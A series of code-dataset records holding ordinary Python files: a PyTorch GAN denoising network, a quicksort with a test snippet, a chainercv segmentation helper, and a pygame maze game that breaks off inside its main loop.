{"seq_id":"200454398","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Module\nfrom torch.autograd import Variable\nimport numpy as np\nfrom collections import OrderedDict\nfrom . import densenet_efficient as dens\nfrom . import time_frequence as tf\n\n###############################################################################\n# Functions\n###############################################################################\n\n\ndef weights_init(m):\n    classname = m.__class__.__name__\n    if classname.find('Conv') != -1:\n        m.weight.data.normal_(0.0, 0.02)\n    elif classname.find('BatchNorm2d') != -1 or classname.find(\n            'InstanceNorm2d') != -1:\n        m.weight.data.normal_(1.0, 0.02)\n        m.bias.data.fill_(0)\n\n\ndef get_norm_layer(norm_type):\n    if norm_type == 'batch':\n        norm_layer = nn.BatchNorm2d\n    elif norm_type == 'instance':\n        norm_layer = nn.InstanceNorm2d\n    else:\n        print('normalization layer [%s] is not found' % norm_type)\n        norm_layer = None\n    return norm_layer\n\n\ndef define_G(n_fft, hop, gpu_ids=[]):\n    netG = None\n    use_gpu = len(gpu_ids) > 0\n\n    if use_gpu:\n        assert (torch.cuda.is_available())\n\n    netG = nn.DataParallel(AuFCN(n_fft, hop))\n\n    if len(gpu_ids) > 0:\n        netG.cuda(device=gpu_ids[0])\n    netG.apply(weights_init)\n    return netG\n\n\ndef define_D(input_nc,\n             ndf,\n             which_model_netD,\n             n_layers_D=3,\n             norm='batch',\n             use_sigmoid=False,\n             gpu_ids=[]):\n    netD = None\n    use_gpu = len(gpu_ids) > 0\n    norm_layer = get_norm_layer(norm_type=norm)\n\n    if use_gpu:\n        assert (torch.cuda.is_available())\n    if which_model_netD == 'basic':\n        netD = NLayerDiscriminator(\n            input_nc,\n            ndf,\n            n_layers=3,\n            norm_layer=norm_layer,\n            use_sigmoid=use_sigmoid,\n            gpu_ids=gpu_ids)\n    elif which_model_netD == 'n_layers':\n        netD = NLayerDiscriminator(\n            input_nc,\n            ndf,\n            n_layers_D,\n            norm_layer=norm_layer,\n            use_sigmoid=use_sigmoid,\n            gpu_ids=gpu_ids)\n    else:\n        print('Discriminator model name [%s] is not recognized' %\n              which_model_netD)\n    if use_gpu:\n        netD.cuda(device=gpu_ids[0])\n    netD.apply(weights_init)\n    return netD\n\n\ndef print_network(net):\n    num_params = 0\n    for param in net.parameters():\n        num_params += param.numel()\n    print(net)\n    print('Total number of parameters: %d' % num_params)\n\n\n##############################################################################\n# Classes\n##############################################################################\n\n\n# Defines the GAN loss which uses either LSGAN or the regular GAN.\n# When LSGAN is used, it is basically the same as MSELoss,\n# but it abstracts away the need to create the target label tensor\n# that has the same size as the input\nclass GANLoss(nn.Module):\n    def __init__(self,\n                 use_lsgan=True,\n                 target_real_label=1.0,\n                 target_fake_label=0.0,\n                 tensor=torch.FloatTensor):\n        super(GANLoss, self).__init__()\n        self.real_label = target_real_label\n        self.fake_label = target_fake_label\n        self.real_label_var = None\n        self.fake_label_var = None\n        self.Tensor = tensor\n        if use_lsgan:\n            self.loss = nn.MSELoss()\n        else:\n            self.loss = nn.BCELoss()\n\n    def get_target_tensor(self, input, target_is_real):\n        target_tensor = None\n        if target_is_real:\n            create_label = ((self.real_label_var is None)\n                            or (self.real_label_var.numel() != input.numel()))\n            if create_label:\n                real_tensor = self.Tensor(input.size()).fill_(self.real_label)\n                self.real_label_var = Variable(\n                    real_tensor, requires_grad=False)\n            target_tensor = self.real_label_var\n        else:\n            create_label = ((self.fake_label_var is None)\n                            or (self.fake_label_var.numel() != input.numel()))\n            if create_label:\n                fake_tensor = self.Tensor(input.size()).fill_(self.fake_label)\n                self.fake_label_var = Variable(\n                    fake_tensor, requires_grad=False)\n            target_tensor = self.fake_label_var\n        return target_tensor\n\n    def __call__(self, input, target_is_real):\n        target_tensor = self.get_target_tensor(input, target_is_real)\n        return self.loss(input, target_tensor)\n\n\nclass AuFCNWrapper(nn.Module):\n    def __init__(self, n_fft, hop, gpu_ids):\n        super(AuFCNWrapper, self).__init__()\n        self.gpu_ids = gpu_ids\n        self.model = AuFCN(n_fft, hop)\n\n    def forward(self, input):\n        if self.gpu_ids and isinstance(input.data,\n                                       torch.cuda.FloatTensor):\n            # scatter the batch across the configured GPUs\n            return nn.parallel.data_parallel(self.model, input, self.gpu_ids)\n        else:\n            return self.model(input)\n\n\n# TODO robust\n# TODO requires gradient\n# TODO assert AC == 0\nclass AuFCN(nn.Module):\n    def __init__(self, n_fft, hop):\n        super(AuFCN, self).__init__()\n        self.mdct_model = tf.mdct(n_fft, hop)\n        self.imdct_model = tf.imdct(n_fft, hop)\n        fcn = dens.DenseNetEfficient(growth_rate=12, block_config=(4, 4, 4, 4), compression=0.5,\n                                     num_init_features=24, bn_size=4, drop_rate=0)\n        self.fcn = fcn\n\n    def forward(self, sample):\n        noisy_spec = self.mdct_model(sample)\n        fcnOutput = self.fcn(noisy_spec)\n\n        clean_spec = fcnOutput * noisy_spec\n        estimated_clean_frame = self.imdct_model(clean_spec)\n\n        return {'time': estimated_clean_frame,\n                'spec': clean_spec}\n\n\nclass Tanh_rescale(Module):\n    def forward(self, input):\n        return torch.div(\n            torch.add(torch.tanh(torch.mul(input, 2.0)), 1.0), 2.0)\n\n    def __repr__(self):\n        return self.__class__.__name__ + ' ()'\n","sub_path":"models/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
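GANLoss above hides the label-tensor bookkeeping behind a plain call. A minimal usage sketch on CPU; the random tensor is a stand-in for a discriminator's patch output, not part of the original module:

import torch

criterion = GANLoss(use_lsgan=True)    # MSE behind the scenes
pred_fake = torch.rand(4, 1, 30, 30)   # stand-in for D(G(x))
loss_g = criterion(pred_fake, True)    # generator wants 'real' labels
loss_d_fake = criterion(pred_fake.detach(), False)
print(loss_g.item(), loss_d_fake.item())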
{"seq_id":"105623174","text":"def quick_sort(a):\n    quick_sort_internal(a, 0, len(a)-1)\n\n\ndef quick_sort_internal(a, start, end):\n    if start < end:\n        sorted_pivot_index = get_sorted_pivot_index(a, start, end)\n        quick_sort_internal(a, start, sorted_pivot_index - 1)\n        quick_sort_internal(a, sorted_pivot_index + 1, end)\n\n\ndef get_sorted_pivot_index(a, start, end):\n    pivot_index = get_pivot_index(a, start, end)\n    pivot_value = a[pivot_index]\n    a[start], a[pivot_index] = a[pivot_index], a[start]\n    border = start\n    for i in range(start, end+1):\n        if a[i] < pivot_value:\n            border += 1\n            a[i], a[border] = a[border], a[i]\n    a[start], a[border] = a[border], a[start]\n    return border\n\n\ndef get_pivot_index(a, start, end):\n    mid = (start + end)//2\n    # median-of-three: pick the value that is the median of the first,\n    # middle and last elements, then return its index\n    pivot_value = sorted([a[start], a[mid], a[end]])[1]\n    if a[start] == pivot_value:\n        return start\n    elif a[mid] == pivot_value:\n        return mid\n    else:\n        return end\n\n\nlst = [10, 5, 20, -1, 0, 100, 2]\n\nprint(\"original---->\")\nprint(lst)\n\nquick_sort(lst)\n\nprint(\"quick sorted---->\")\nprint(lst)\n","sub_path":"PYTHON/PYTHON_DSA/p06_quick_sort_o_nsquare.py","file_name":"p06_quick_sort_o_nsquare.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
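A quick randomized check that the median-of-three quicksort above agrees with Python's built-in sort; a throwaway test harness, not part of the original file:

import random

for _ in range(100):
    data = [random.randint(-50, 50) for _ in range(random.randint(0, 30))]
    expected = sorted(data)
    quick_sort(data)  # sorts in place
    assert data == expected, data
print("quick_sort agrees with sorted() on 100 random lists")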
Each iterator corresponds\n to a value of a sample from the iterator.\n For example, if the iterator returns a batch of\n :obj:`(img, val0, val1)`, :obj:`next(gt_values)`\n will be :obj:`(val0, val1)`.\n \"\"\"\n\n iterators = split_iterator(_apply(target, iterator, hook))\n pred_labels = iterators[0]\n gt_values = iterators[1:]\n return pred_labels, gt_values\n\n\ndef _apply(target, iterator, hook):\n for batch in iterator:\n batch_imgs = list()\n batch_gt_values = list()\n\n for sample in batch:\n if isinstance(sample, np.ndarray):\n batch_imgs.append(sample)\n batch_gt_values.append(tuple())\n else:\n batch_imgs.append(sample[0])\n batch_gt_values.append(sample[1:])\n\n batch_pred_labels = target.predict(batch_imgs)\n\n if hook:\n hook(\n batch_pred_labels,\n tuple(list(bv) for bv in zip(*batch_gt_values)))\n\n for pred_label, gt_value in zip(batch_pred_labels, batch_gt_values):\n yield (pred_label,) + gt_value\n","sub_path":"chainercv/utils/iterator/apply_semantic_segmentation_link.py","file_name":"apply_semantic_segmentation_link.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"156728663","text":"import os\nimport sys\nimport math\nimport time\nimport random\n\nfrom operator import itemgetter\n\nimport pygame\n\n\nsys.setrecursionlimit(10**6)\nprint(f'Recursion limit is {sys.getrecursionlimit()}')\n\n\n# группы спрайтов\nALL_SPRITES = pygame.sprite.Group()\nTILES_GROUP = pygame.sprite.Group()\nPLAYER_GROUP = pygame.sprite.Group()\nWALL_GROUP = pygame.sprite.Group()\nFLOOR_GROUP = pygame.sprite.Group()\nCREATURES_GROUP = pygame.sprite.Group()\nTHING_GROUP = pygame.sprite.Group()\nEXIT_GROUP = pygame.sprite.Group()\nBLOOD_GROUP = pygame.sprite.Group()\n\n# свои события\nCREATURE_EVENT_TYPE = 1\nTHING_EVENT_TYPE = 2\n\n\ndef load_image(name, colorkey=None):\n # Загрузка изображений\n fullname = os.path.join('data', name)\n image = pygame.image.load(fullname)\n if colorkey is not None:\n if colorkey == -1:\n colorkey = image.get_at((0, 0))\n image.set_colorkey(colorkey)\n else:\n image = image.convert_alpha()\n return image\n\n\ndef get_sprite_groups_by_type(type):\n # возвращаем группы спрайтов в зависимости от типа\n if type == 'wall': # стена\n return ALL_SPRITES, TILES_GROUP, WALL_GROUP\n if type == 'floor': # пол\n return ALL_SPRITES, TILES_GROUP, FLOOR_GROUP\n if type == 'exit': # выход\n return ALL_SPRITES, TILES_GROUP, EXIT_GROUP\n if type == 'player':\n return ALL_SPRITES, PLAYER_GROUP\n if type in ('spider', 'skeleton', 'bahamut'):\n return ALL_SPRITES, CREATURES_GROUP\n if type in ('coin', 'heart'):\n return ALL_SPRITES, THING_GROUP\n return ALL_SPRITES\n\n\nclass Tile(pygame.sprite.Sprite):\n # tile setting (клетка)\n size = 25\n images = {\n 'wall': load_image('25x25/wall.png'),\n 'floor': load_image('25x25/floor.png'),\n 'exit': load_image('25x25/floor.png'),\n }\n\n def __init__(self, tile_type, pos_x, pos_y):\n self.type = tile_type\n groups = get_sprite_groups_by_type(type=self.type)\n super().__init__(*groups)\n self.image = Tile.images[tile_type]\n self.rect = self.image.get_rect().move(pos_x, pos_y)\n\n\ndef group_collide_mask(target, group):\n # Проверка пересечения с группой спрайтов по маске\n sprites = pygame.sprite.spritecollide(target, group, dokill=False)\n # collide_mask работает только со спрайтами, не с группами!\n if sprites and any(pygame.sprite.collide_mask(target, sprite) for sprite in sprites):\n # Пересечение обнаружено.\n return True\n return 
{"seq_id":"156728663","text":"import os\nimport sys\nimport math\nimport time\nimport random\n\nfrom operator import itemgetter\n\nimport pygame\n\n\nsys.setrecursionlimit(10**6)\nprint(f'Recursion limit is {sys.getrecursionlimit()}')\n\n\n# sprite groups\nALL_SPRITES = pygame.sprite.Group()\nTILES_GROUP = pygame.sprite.Group()\nPLAYER_GROUP = pygame.sprite.Group()\nWALL_GROUP = pygame.sprite.Group()\nFLOOR_GROUP = pygame.sprite.Group()\nCREATURES_GROUP = pygame.sprite.Group()\nTHING_GROUP = pygame.sprite.Group()\nEXIT_GROUP = pygame.sprite.Group()\nBLOOD_GROUP = pygame.sprite.Group()\n\n# custom events\nCREATURE_EVENT_TYPE = 1\nTHING_EVENT_TYPE = 2\n\n\ndef load_image(name, colorkey=None):\n    # load an image\n    fullname = os.path.join('data', name)\n    image = pygame.image.load(fullname)\n    if colorkey is not None:\n        if colorkey == -1:\n            colorkey = image.get_at((0, 0))\n        image.set_colorkey(colorkey)\n    else:\n        image = image.convert_alpha()\n    return image\n\n\ndef get_sprite_groups_by_type(type):\n    # return the sprite groups for the given type\n    if type == 'wall':  # wall\n        return ALL_SPRITES, TILES_GROUP, WALL_GROUP\n    if type == 'floor':  # floor\n        return ALL_SPRITES, TILES_GROUP, FLOOR_GROUP\n    if type == 'exit':  # exit\n        return ALL_SPRITES, TILES_GROUP, EXIT_GROUP\n    if type == 'player':\n        return ALL_SPRITES, PLAYER_GROUP\n    if type in ('spider', 'skeleton', 'bahamut'):\n        return ALL_SPRITES, CREATURES_GROUP\n    if type in ('coin', 'heart'):\n        return ALL_SPRITES, THING_GROUP\n    return ALL_SPRITES\n\n\nclass Tile(pygame.sprite.Sprite):\n    # tile settings (one maze cell)\n    size = 25\n    images = {\n        'wall': load_image('25x25/wall.png'),\n        'floor': load_image('25x25/floor.png'),\n        'exit': load_image('25x25/floor.png'),\n    }\n\n    def __init__(self, tile_type, pos_x, pos_y):\n        self.type = tile_type\n        groups = get_sprite_groups_by_type(type=self.type)\n        super().__init__(*groups)\n        self.image = Tile.images[tile_type]\n        self.rect = self.image.get_rect().move(pos_x, pos_y)\n\n\ndef group_collide_mask(target, group):\n    # mask-based collision check against a sprite group\n    sprites = pygame.sprite.spritecollide(target, group, dokill=False)\n    # collide_mask only works with sprites, not with groups!\n    if sprites and any(pygame.sprite.collide_mask(target, sprite) for sprite in sprites):\n        # collision detected\n        return True\n    return False\n\n\nclass AnimatedSprite(pygame.sprite.Sprite):\n    def __init__(self, spite_type, sheet, columns, rows, x, y):\n        groups = get_sprite_groups_by_type(type=spite_type)\n        super().__init__(*groups)\n        self.frames = []\n        self.cut_sheet(sheet, columns, rows)\n        # use the front view as the initial frame\n        self.cur_columns = [0] * rows\n        self.cur_row = 0\n        self.image = self.frames[self.cur_row][self.cur_columns[self.cur_row]]\n        self.rect = self.rect.move(x, y)\n\n        # precompute the mask for efficient collision checks\n        self.mask = pygame.mask.from_surface(self.image)\n\n    def cut_sheet(self, sheet, columns, rows):\n        # slice up the sprite sheet that holds the frames\n        self.rect = pygame.Rect(0, 0, sheet.get_width() // columns, sheet.get_height() // rows)\n        for j in range(rows):\n            row_frames = []\n            for i in range(columns):\n                frame_location = (self.rect.w * i, self.rect.h * j)\n                row_frames.append(sheet.subsurface(pygame.Rect(frame_location, self.rect.size)))\n            self.frames.append(row_frames)\n\n    def next_frame(self, row):\n        # advance to the next frame\n        self.cur_row = row\n        self.cur_columns[row] = (self.cur_columns[row] + 1) % len(self.frames[row])\n        self.image = self.frames[self.cur_row][self.cur_columns[self.cur_row]]\n\n\nclass Thing(AnimatedSprite):\n    # base class for Things (coins included) that the Player can pick up\n    def __init__(self, spite_type, sheet, columns, rows, pos_x, pos_y, player):\n        self.type = spite_type\n        self.x = pos_x\n        self.y = pos_y\n        self.player = player\n        super().__init__(spite_type=self.type, sheet=sheet, columns=columns, rows=rows,\n                         x=self.x, y=self.y)\n\n    def update(self, *args):\n        self.next_frame(row=0)\n        # animation delay\n        pygame.time.set_timer(THING_EVENT_TYPE, 300)  # milliseconds\n\n\nclass CoinThing(Thing):\n    def __init__(self, pos_x, pos_y, player):\n        sheet = load_image('25x25/coin.png')\n        columns = 4\n        rows = 1\n        super().__init__(spite_type='coin', sheet=sheet, columns=columns, rows=rows,\n                         pos_x=pos_x, pos_y=pos_y, player=player,)\n\n\nclass HeartThing(Thing):\n    def __init__(self, pos_x, pos_y, player):\n        sheet = load_image('25x25/heart.png')\n        columns = 1\n        rows = 1\n        super().__init__(spite_type='heart', sheet=sheet, columns=columns, rows=rows,\n                         pos_x=pos_x, pos_y=pos_y, player=player,)\n\n\nclass Creature(AnimatedSprite):\n    # base class for Creatures that chase the Player\n    def __init__(self, spite_type, sheet, columns, rows, pos_x, pos_y, player, step, damage):\n        self.type = spite_type\n        self.x = pos_x\n        self.y = pos_y\n        self.player = player\n        self.step = step\n        self.damage = damage\n        super().__init__(spite_type=self.type, sheet=sheet, columns=columns, rows=rows,\n                         x=self.x, y=self.y)\n\n    def update(self, *args):\n        x = self.rect.x\n        y = self.rect.y\n        cur_coord = self.rect.x, self.rect.y  # remember the current position\n\n        # a creature has four possible movement directions\n        north = x, y - self.step\n        south = x, y + self.step\n        west = x - self.step, y\n        east = x + self.step, y\n\n        # keep only the directions (coordinates) that do not hit a wall\n        coords = []\n        for coord in (north, south, west, east):\n            self.rect.x, self.rect.y = coord\n\n            # collision with walls\n            if not group_collide_mask(self, WALL_GROUP):\n                coords.append(coord)  # no wall collision: accept these coordinates\n\n            # restore the original position for the next loop iteration\n            self.rect.x, self.rect.y = cur_coord\n\n        if len(coords) > 1:\n            # there are 2, 3 or 4 possible directions, one of them the previous position\n            coords = [coord for coord in coords if coord != 
cur_coord]  # drop the previous position\n            # choose the new position by proximity to the player, so the enemy follows them\n            # distance formula between two points, one of which is the player's position\n            # https://ru.onlinemschool.com/math/library/analytic_geometry/point_point_length/\n            distances = []\n            for x, y in coords:\n                # √(xb - xa)^2 + (yb - ya)^2\n                distances.append(round(math.sqrt((self.player.rect.x - x) ** 2 + (self.player.rect.y - y) ** 2)))\n            self.rect.x, self.rect.y = coords[distances.index(min(distances))]\n        else:\n            # stuck in a wall -> step out in any direction\n            self.rect.x, self.rect.y = north\n\n        # switch to the frame for the chosen direction\n        new_coord = self.rect.x, self.rect.y\n        if new_coord == north:\n            self.next_frame(row=3)\n        elif new_coord == south:\n            self.next_frame(row=0)\n        elif new_coord == west:\n            self.next_frame(row=1)\n        elif new_coord == east:\n            self.next_frame(row=2)\n\n        #\n        # check collision with the Player (deal damage)\n        #\n        if pygame.sprite.collide_mask(self.player, self):\n            self.player.health -= self.damage\n            create_blood(player=self.player, damage=self.damage)\n\n        # creatures move with a delay\n        pygame.time.set_timer(CREATURE_EVENT_TYPE, 100)  # milliseconds\n\n\nclass SpiderCreature(Creature):\n    def __init__(self, pos_x, pos_y, player):\n        sheet = load_image('25x25/spider.png')\n        columns = 6\n        rows = 4\n        super().__init__(\n            spite_type='spider', sheet=sheet, columns=columns, rows=rows,\n            pos_x=pos_x, pos_y=pos_y, player=player, step=3, damage=1,  # step = creature speed\n        )\n\n\nclass SkeletonCreature(Creature):\n    def __init__(self, pos_x, pos_y, player):\n        sheet = load_image('25x25/skeleton.png')\n        columns = 3\n        rows = 4\n        super().__init__(\n            spite_type='skeleton', sheet=sheet, columns=columns, rows=rows,\n            pos_x=pos_x, pos_y=pos_y, player=player, step=2, damage=2,  # step = creature speed\n        )\n\n\nclass BahamutCreature(Creature):\n    def __init__(self, pos_x, pos_y, player):\n        sheet = load_image('25x25/bahamut.png')\n        columns = 3\n        rows = 4\n        super().__init__(\n            spite_type='bahamut', sheet=sheet, columns=columns, rows=rows,\n            pos_x=pos_x, pos_y=pos_y, player=player, step=1, damage=10,  # step = creature speed\n        )\n\n\nclass Player(AnimatedSprite):\n    def __init__(self, pos_x, pos_y):\n        self.type = 'player'\n        self.health = 100\n        self.coins = 0\n        self.win = False\n        self.x = pos_x\n        self.y = pos_y\n        sheet = load_image('25x25/player.png')\n        columns = 4\n        rows = 4\n        super().__init__(spite_type=self.type, sheet=sheet, columns=columns, rows=rows,\n                         x=self.x, y=self.y)\n\n    def update(self, *args):\n        key_pressed = any(pygame.key.get_pressed())\n\n        if key_pressed:\n            for step in range(4, 0, -1):  # [4, 3, 2, 1]\n                cur_coord = self.rect.x, self.rect.y  # remember the current position\n\n                if pygame.key.get_pressed()[pygame.K_UP]:\n                    self.rect.y -= step\n                    # switch the player's frame\n                    self.next_frame(row=3)\n                if pygame.key.get_pressed()[pygame.K_DOWN]:\n                    self.rect.y += step\n                    self.next_frame(row=0)\n                if pygame.key.get_pressed()[pygame.K_LEFT]:\n                    self.rect.x -= step\n                    self.next_frame(row=1)\n                if pygame.key.get_pressed()[pygame.K_RIGHT]:\n                    self.rect.x += step\n                    self.next_frame(row=2)\n\n                #\n                # check collision with a Thing (the Player picks it up)\n                #\n                for sprite in THING_GROUP:\n                    if pygame.sprite.collide_mask(self, sprite):\n                        self.add_thing(thing=sprite)\n                        sprite.kill()\n                #\n                # check collision with the Exits (game over, victory)\n                #\n                for sprite in EXIT_GROUP:\n                    if pygame.sprite.collide_mask(self, sprite):\n                        self.win = True\n                #\n                # check 
collision with the walls\n                #\n                if group_collide_mask(self, WALL_GROUP):\n                    # wall collision: cancel this move (restore the previous values)\n                    self.rect.x, self.rect.y = cur_coord\n                else:\n                    # no wall collision: the move by the given step is allowed\n                    break\n\n    def add_thing(self, thing):\n        if isinstance(thing, CoinThing):\n            pygame.mixer.Sound('data/sound_effect/coin.wav').play()\n            self.coins += 1\n        elif isinstance(thing, HeartThing):\n            pygame.mixer.Sound('data/sound_effect/pick_up_health.wav').play()\n            self.health += 25\n            if self.health > 100:  # health cannot exceed 100!\n                self.health = 100\n\n\nclass Camera:\n    # set the initial camera offset\n    def __init__(self, width, height):\n        self.dx = 0\n        self.dy = 0\n        self.width = width\n        self.height = height\n\n    # shift the object obj by the camera offset\n    def apply(self, obj):\n        obj.rect.x += self.dx\n        obj.rect.y += self.dy\n\n    # center the camera on the target object\n    def update(self, target):\n        self.dx = -(target.rect.x + target.rect.w // 2 - self.width // 2)\n        self.dy = -(target.rect.y + target.rect.h // 2 - self.height // 2)\n\n\ndef generate_level(maze_width, maze_height):\n    # The maze string is encoded with the characters '+', '-', '|' and space.\n    # Every character except space is drawn as a wall tile - these are the maze walls.\n    # The '|' character is drawn as a rectangle (two wall tiles stacked vertically).\n    # A space is drawn as a floor tile.\n    s = make_maze(maze_width, maze_height)\n    print(s)\n    lines = s.splitlines()\n\n    # make two entrances into the maze: in effect, replace some characters with gaps:\n    for n, line in enumerate(lines):\n        if n == 0 or n == len(lines) - 1:  # first and last rows\n            enter = random.randint(1, len(line) - 3)\n            lines[n] = lines[n][:enter] + '@@' + lines[n][enter + 2:]\n\n    start_x = 0\n    start_y = 0\n    tile_size = Tile.size\n\n    for n, line in enumerate(lines):\n        if n % 2 == 0:\n            # horizontal line (3 tiles). Possible characters: '+', '-' and space.\n            for k, char in enumerate(line):\n                x0 = start_x + (k * tile_size)\n                y0 = start_y\n\n                if char == '+' or char == '-':\n                    Tile('wall', x0, y0)\n                elif char == ' ':\n                    Tile('floor', x0, y0)\n                elif char == '@':\n                    Tile('exit', x0, y0)\n\n            # shift by 1 tile along Y\n            start_y += tile_size\n        else:\n            # vertical line (6 tiles). 
Possible characters: '|' and space.\n            for k, char in enumerate(line):\n                x0 = start_x + (k * tile_size)\n                y0 = start_y\n\n                if char == '|':\n                    Tile('wall', x0, y0)\n                    Tile('wall', x0, y0 + tile_size)\n                elif char == ' ':\n                    Tile('floor', x0, y0)\n                    Tile('floor', x0, y0 + tile_size)\n\n            # shift by 2 tiles along Y\n            start_y += 2 * tile_size\n\n\ndef generate_player(taken):\n    # place the Player near the center of the maze (when possible)\n    for n, tile in enumerate(FLOOR_GROUP):\n        if n > len(FLOOR_GROUP) / 2:\n            taken.append(n)\n            return Player(tile.rect.x, tile.rect.y)\n    assert False, 'The field is too small - the player cannot be placed.'\n\n\ndef generate_content(sprite_class, player, chance, taken):\n    for n, tile in enumerate(FLOOR_GROUP):\n        if n not in taken:\n            # placed on a floor tile with a probability of chance percent\n            if random.randint(1, 10000) / 100 <= chance:\n                sprite_class(pos_x=tile.rect.x, pos_y=tile.rect.y, player=player)\n                taken.append(n)\n\n\ndef create_menu(screen, color, font, is_mouse_down):\n    button_start = pygame.Rect(200, 150, 400, 50)\n    button_scores = pygame.Rect(200, 225, 400, 50)\n    button_exit = pygame.Rect(200, 300, 400, 50)\n\n    # the function returns a set of flags that drive further menu behavior\n    exit = False\n    menu = True\n    score_table = False\n\n    mouse_x, mouse_y = pygame.mouse.get_pos()\n\n    # Start Game button\n    if button_start.collidepoint(mouse_x, mouse_y):\n        # pressed...\n        button_text_start = create_text('Start Game', font=font, font_color=(0, 0, 0),\n                                        bg_color=color, pos_x=400, pos_y=175)\n        pygame.draw.rect(screen, color, button_start)\n        if is_mouse_down:\n            menu = False\n    else:\n        button_text_start = create_text('Start Game', font=font, font_color=color,\n                                        pos_x=400, pos_y=175)\n        pygame.draw.rect(screen, color, button_start, 2)\n\n    # Scores button\n    if button_scores.collidepoint(mouse_x, mouse_y):\n        # pressed...\n        button_text_scores = create_text('Scores', font=font, font_color=(0, 0, 0),\n                                         bg_color=color, pos_x=400, pos_y=250)\n        pygame.draw.rect(screen, color, button_scores)\n        if is_mouse_down:\n            score_table = True\n    else:\n        button_text_scores = create_text('Scores', font=font, font_color=color,\n                                         pos_x=400, pos_y=250)\n        pygame.draw.rect(screen, color, button_scores, 2)\n\n    # Exit button\n    if button_exit.collidepoint(mouse_x, mouse_y):\n        # pressed...\n        button_text_exit = create_text('Exit', font=font, font_color=(0, 0, 0),\n                                       bg_color=color, pos_x=400, pos_y=325)\n        pygame.draw.rect(screen, color, button_exit)\n        if is_mouse_down:\n            exit = True\n    else:\n        button_text_exit = create_text('Exit', font=font, font_color=color,\n                                       pos_x=400, pos_y=325)\n        pygame.draw.rect(screen, color, button_exit, 2)\n\n    screen.blit(*button_text_start)\n    screen.blit(*button_text_scores)\n    screen.blit(*button_text_exit)\n    return menu, score_table, exit\n\n\ndef create_score_table(screen, color, font, is_mouse_down):\n    # show the best results from the database (a plain file)\n    results = []\n    with open('data/results', mode='r') as fd:\n        for n, line in enumerate(fd.readlines(), start=1):\n            results.append(tuple(map(int, line.strip().split(':'))))  # coins, elapsed_seconds, maze_width, maze_height\n\n    # sort the results; show at most five rows (the screen cannot fit more)\n    results = sorted(results, key=itemgetter(0), reverse=True)[:5]\n\n    for n, (coins, elapsed_seconds, maze_width, maze_height) in enumerate(results):\n        text = f'{n + 1}. 
{coins} coins, {elapsed_seconds} seconds, maze {maze_width}x{maze_height}'\n text, rect = create_text(text, font=font, font_color=color,\n pos_x=400, pos_y=150 + 50 * n)\n # Выравниваем текст не по центру, а по левому краю\n rect.x = 150\n rect.y = 150 + 50 * n\n screen.blit(text, rect)\n\n button_back = pygame.Rect(200, 500, 400, 50)\n\n # Функция возвращает флаг, который определяет дальнейшее поведение меню\n score_table = True\n\n mouse_x, mouse_y = pygame.mouse.get_pos()\n\n # Кнопка Back to Menu\n if button_back.collidepoint(mouse_x, mouse_y):\n # нажата...\n button_text_back = create_text('Back to Menu', font=font, font_color=(0, 0, 0),\n bg_color=color, pos_x=400, pos_y=525)\n pygame.draw.rect(screen, color, button_back)\n if is_mouse_down:\n score_table = False\n else:\n button_text_back = create_text('Back to Menu', font=font, font_color=color,\n pos_x=400, pos_y=525)\n pygame.draw.rect(screen, color, button_back, 2)\n\n screen.blit(*button_text_back)\n return score_table\n\n\ndef maze_game():\n pygame.init()\n running = True\n pause = False\n menu = True\n score_table = False\n\n # clock setup\n clock = pygame.time.Clock()\n fps = 20 # Увеличивая FPS или размер лабиринта Игра начинает тормозить из-за большого кол-ва спрайтов\n\n # screen setup\n size = width, height = 800, 600 # in pixels\n screen = pygame.display.set_mode(size)\n pygame.display.set_caption('-|- Maze Game -|-')\n\n # font setup (# 2nd parameter is size of the font)\n font = pygame.font.Font('data/fonts/FreeSansBold.ttf', 32)\n large_font = pygame.font.Font('data/fonts/FreeSansBold.ttf', 64)\n small_font = pygame.font.Font('data/fonts/FreeSansBold.ttf', 16)\n blood_color = (240, 0, 0)\n black_color = (0, 0, 0)\n default_color = (239, 232, 218)\n\n # menu\n while running and menu:\n screen.fill((0, 0, 0))\n header = create_text('MAZE', font=large_font, font_color=blood_color,\n pos_x=width / 2, pos_y=80)\n screen.blit(*header)\n\n is_mouse_down = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n is_mouse_down = True\n\n if score_table:\n # Таблица результатов\n score_table = create_score_table(screen=screen, color=blood_color, font=font,\n is_mouse_down=is_mouse_down)\n else:\n # Основное меню\n menu, score_table, exit = create_menu(screen=screen, color=blood_color, font=font,\n is_mouse_down=is_mouse_down)\n running = running and not exit\n\n pygame.display.update()\n clock.tick(fps)\n\n # camera setup\n camera = Camera(width=width, height=height)\n\n # generate level, player, creatures\n maze_width = 10\n maze_height = 5\n generate_level(maze_width=maze_width, maze_height=maze_height) # в клетках\n\n # Вести учет занятых клеток, чтобы не ставить существ, монеты и прочие в одну клетку\n taken = []\n player = generate_player(taken=taken)\n generate_content(SpiderCreature, player=player, chance=0.7, taken=taken)\n generate_content(SkeletonCreature, player=player, chance=0.5, taken=taken)\n generate_content(BahamutCreature, player=player, chance=0.2, taken=taken)\n generate_content(CoinThing, player=player, chance=15.0, taken=taken)\n generate_content(HeartThing, player=player, chance=1.0, taken=taken)\n\n # Запустить существа ходить по карте\n pygame.time.set_timer(CREATURE_EVENT_TYPE, 100) # milliseconds\n # Запустить анимацию у вещей\n pygame.time.set_timer(THING_EVENT_TYPE, 300) # milliseconds\n\n start_time = time.time()\n elapsed_seconds = 0\n\n while running and player.health > 0 and player.win is False:\n for event in 
